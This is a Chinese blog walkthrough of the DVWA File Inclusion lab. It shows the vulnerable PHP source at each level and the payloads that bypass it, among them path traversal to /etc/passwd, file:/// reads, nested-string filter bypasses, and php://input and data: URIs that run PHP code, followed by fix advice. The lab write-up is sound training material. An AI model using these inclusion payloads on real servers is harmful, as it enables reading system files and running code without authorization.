DVWA-File Inclusion

最新推荐文章于 2024-05-20 12:13:04 发布
最新推荐文章于 2024-05-20 12:13:04 发布
阅读量282 收藏
点赞数
分类专栏: DVWA 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44866139/article/details/104215668
版权

文件包含是指应用程序加载的文件(本地/远程)可以由用户提交的数据控制,从而导致攻击者控制恶意文件在服务器上执行.

对于php来说,常见的文件包含函数有如下:

require:找不到被包含的文件,报错,并且停止运行脚本。 include:找不到被包含的文件,只会报错,但会继续运行脚本。
require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。
include_once:与include类似,区别在于当重复调用同一文件时,程序只调用一次。

文件包含特征
?page=a.php
?home=b.html
?file=content
检测方法
?file=…/…/…/…/etc/passwd
?page=file:///etc/passwd
?home=main.cgi
?page=http://www.a.com/1.php
http://1.1.1.1/…/…/…/…/dir/file.txt

报错的解决方法:
在这里插入图片描述
新建一个php文件,展示php的版本信息,找到php.ini文件的存储位置
在这里插入图片描述
在这里插入图片描述
修改php.ini配置文件开启文件包含功能,allow_url_include = on

Low

1、查看服务器端源代码

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?>

可以看到没有对page参数做任何过滤
2、查看客户端源代码
在这里插入图片描述
3、构造payload

-绝对路径:c:\window\win.ini

该文件为重要的系统文件。默认保存在C:\Windows\win.ini,一般大小不超过100KB我们可以使用记事本轻松的打开编辑这个文件,其作用就是用于保存系统配置文件

通过page参数传递服务器本地文件,进行LFT攻击
在这里插入图片描述
在这里插入图片描述
文件包含时,不管包含的文件是什么类型,都会优先尝试当作php文件执行,如果文件内容有php代码,则会执行php代码并返回代码执行的结果,如果文件内容没有php代码,则把文件内容打印出来

相对路径:…/…/…/…/…/…/…/…/…/…/etc/password
./ 当前目录。
…/ 父级目录。
/ 根目录。

是相对于dvwa-master/vulnerabilities/fi的文件位置
在这里插入图片描述
使用php封装协议读取和写入php文件

远程文件包含
1.通过http协议包含本地服务器上的文件
在这里插入图片描述
2.通过http协议包含远程服务器上的文件
。。。。

Medium

1、查看服务器端源代码

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

清除 page 参数中的 http://、https://、…/、…\字符串, 可以使用 php://input,php://filter, data url schema 等进行注入,也可使用替换逻辑漏洞(只替换一次)将被替换字符串迭代使用,例如 hthttp://tp://被替换后为 http://

2、攻击
本地文件包含攻击
….//….//….//….//….//….//….//….//….//….//etc/password
…/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/password
远程文件包含攻击
在这里插入图片描述
使用绝对路径绕过
在这里插入图片描述
使用file协议绕过

中文意思:本地文件传输协议
什么是File:File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。
如何使用File:要使用File协议,基本的格式如下:file:///文件路径,比如要打开F盘flash文件夹中的1.swf文件,那么可以在资源管理器或浏览器地址栏中输入:file:///f:/flash/1.swf回车。
在这里插入图片描述

使用php封装协议读取和写入php文件
php://input <?php phpinfo();
在这里插入图片描述
不知咋滴出现warning…

data:text/plain;charset=utf-8,<?php phpinfo();
在这里插入图片描述

High

1、查看服务器端源代码

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

fnmatch()
根据指定的模式来匹配文件名或字符串
2、攻击
对提交参数进行检查,只允许 include.php 以及 file 开头的文件被包含,只能包含本地file 开头的文件或配合文件上传漏洞组合进行利用

Impossible

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

修复建议
a) 使用白名单列表限制被包含文件
b) 关闭远程文件包含功能
c) 避免 web 服务器启动用户权限过高

部分内容参考:
https://www.cnblogs.com/yuzly/p/10799486.html

一只小白来了
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件包含漏洞、DVWA-File Inclusion
weixin_41487522的博客
06-30 354
文件包含漏洞 什么是文件包含漏洞? 攻击者利用包含的特性,加上应用本身对文件(包含)控制不严格,最终造成攻击者进行任意文件包含。 (包含的文件会被当做脚本文件来解析) 一句话来说就是:文件包含并不属于漏洞,但是,由于对包含进来的文件不可控,导致了文件包含漏洞的产生。 包含文件很有用,可以简化代码 文件包含分为本地和远程文件包含(需要allow_url_include=On) 本地文件包含LFI 远程文件包含RFI 函数解析 这里我们需要了解4个PHP的函数 include:使用include引用外部文件时,
DVWA-master.zip
08-22
DVWA的"File Inclusion"部分,你可以学习如何检测和修复这类问题。 5. **命令注入**:当应用程序使用不受信任的输入来构建操作系统命令时,攻击者可能执行任意系统命令。"Command Injection"章节提供了一个实践...
DVWA-File Inclusion(文件包含)
qq_45751902的博客
04-25 323
目录简介安全级别:Low本地文件包含远程文件包含安全级别:Medium安全级别:High安全级别:Impossible防护总结:参考 简介 1.文件包含 开发人员将相同的函数入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编,这种文件调用的过程称文件包含; 2. 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞;在PHP中经常出现文件包含漏洞; 3.php中引发文件包含漏洞的通常是以下四个函数 inc
DVWA-File Inclusion(文件包含)
Cwillchris的博客
10-28 2286
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: FileInclusion,意思是文件包含(漏洞),是指当服务器开启 allow_url_include选项时,就可以通过php的某些特性函数(include(), require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。.
DVWA-文件包含(File Inclusion
weixin_58954236的博客
08-19 375
文件包含:开发人员将相同的函数入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编,这种文件调用的过程称文件包含。文件包含漏洞:开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞。文件包含是利用函数来包含web目录以外的文件,分为本地包含和远程包含。
DVWA-File Inclusion模块展开实验
最新发布
weixin_52363821的博客
05-20 601
File inclusion,文件包含(漏洞)。程序开发人员通常出于灵活性的考虑,会将被包含的文件设置成变量,然后动态调用这些文件。但正是因为调用的灵活性导致用户可能调用一些恶意文件,造成文件包含漏洞。文件包含漏洞分为本地文件包含漏洞和远程文件包含漏洞。
DVWA-File Inclusion通关教程-完结
刘箫-技术库
04-03 808
服务器包含文件时,无论文件是否是 PHP 文件,都会尝试当做 PHP 文件来执行。如果文件内容确实是 PHP 文件,则会正常执行并返回结果,如果不是则会将文件内容回显到网页中,所以文件包含漏洞常常会导致任意文件读取与任意命令执行。代码中使用了fnmatch()函数检查page参数,要求page参数的开头必须是file,服务器才会去包含相应的文件。代码使用了白名单机制防御文件包含漏洞,如果不是代码中的这些文件名,则一律进行报错显示。进行了过滤,防止了远程包含漏洞的产生,同时也过滤了。防止攻击者进行目录切换。
DVWA-File Inclusion学习笔记
weixin_42739903的博客
12-09 170
一、文件包含与漏洞 文件包含: 开发人员将相同的函数入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编,这种文件调用的过程称文件包含。 文件包含漏洞: 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞。 二、文件包含漏洞用到的函数 require:找不到被包含的文件,报错,并且停止运行脚本include:找不到被包含的文件,只会报错,但会继续运行脚本。 require_once:与require类似,区别在于当
DVWA靶场------File Inclusion(文件包含漏洞)
m0_65712192的博客
11-13 1214
DVWA靶场------File Inclusion(文件包含漏洞)
DVWA-File Inclusion实战篇--文件包含漏洞
weixin_58660073的博客
06-13 367
DVWA实战篇--文件包含漏洞 File Inclusion 漏洞介绍 为了使代码更加灵活,通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。对一个简单的 PHP 小程序来说,在不同的 PHP 脚本之间剪切或复制某一函数不是大问题, 但是当进入项目开发时,函数的数量将会变得相当庞大,并且函数具有较强的复杂性,这时你就会把它们保存到一个便于随时调用的函数库中,以便于该函数在整个项目中可以随时被调用。通常情况下这个函数库是一个文.
DVWA(Damn Vulnerable Web Application)程序源码v1.9稳定版.zip
02-03
3. **文件包含漏洞**:DVWA的"File Inclusion"模块让用户了解文件包含漏洞的危害。通过不当的动态文件包含,攻击者可能能读取服务器上的任意文件,甚至执行系统命令。 4. **弱认证与会话管理**:DVWA的...
DVWA-command injection
weixin_44866139的博客
02-07 614
命令执行漏洞是指攻击者可以随意执行系统命令,属于高危漏洞之一,也属于代码执行的范畴。不仅存在一B/S架构中,也存在于C/S架构中。 OS命令执行漏洞:在windows和linux系统下,"&&"的作用是将两条命令连起来执行,此外,&、||、|符号同样也可以作为命令连接符使用,如net user ||set、net user | set、net user & set,...
DVWA-XSS(Reflected)
weixin_44866139的博客
01-31 613
Low 1、查看服务器端源代码 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '&l...
DVWA-XSS(Stored)
weixin_44866139的博客
02-01 598
Low 直接输入 1、查看服务器端源代码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message...
DVWA-CSRF
weixin_44866139的博客
02-03 408
CSRF攻击原理 跨站请求伪造,听起来像XSS跨站脚本攻击,但攻击方式完全不同,CSRF更加难以防范,更具危险性。CSRF建立在会话之上,可以通过欺骗用户访问URL来实现。CSRF攻击是黑客借助受害者的Cookie骗取服务器的信任,但是黑客并不能获取到Cookie的内容,另外,由于浏览器同源策略的限制,黑客无法从返回的结果中得到任何东西,CSRF所能做到的就是给服务器发送请求。 任何web脚本语言...
DVWA-Weak Session IDs
weixin_44866139的博客
02-10 250
用户访问服务器的时候,一般服务器都会分配一个身份证 session id 给用户,用于标识。用户拿到 session id 后就会保存到 cookies 上,之后只要拿着 cookies 再访问服务器,服务器就知道你是谁了。 但是 session id 过于简单就会容易被人伪造。根本都不需要知道用户的密码就能访问,用户服务器的内容了. Low cookies 上 dvwaSessionId +...
DVWA-File Upload
weixin_44866139的博客
02-10 196
文件上传是指攻击者通过上传可执行脚本功能,从而获取服务器端可执行命令的权限。 Low 1、查看服务器端源代码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/u...
dvwa file inclusionfile upload
05-12
其中包括文件包含(File Inclusion)和文件上传(File Upload)两种漏洞。 文件包含漏洞是指Web应用程序未对用户输入的文件路径进行充分验证,导致攻击者能够构造恶意的文件路径来读取、执行或删除服务器上的敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值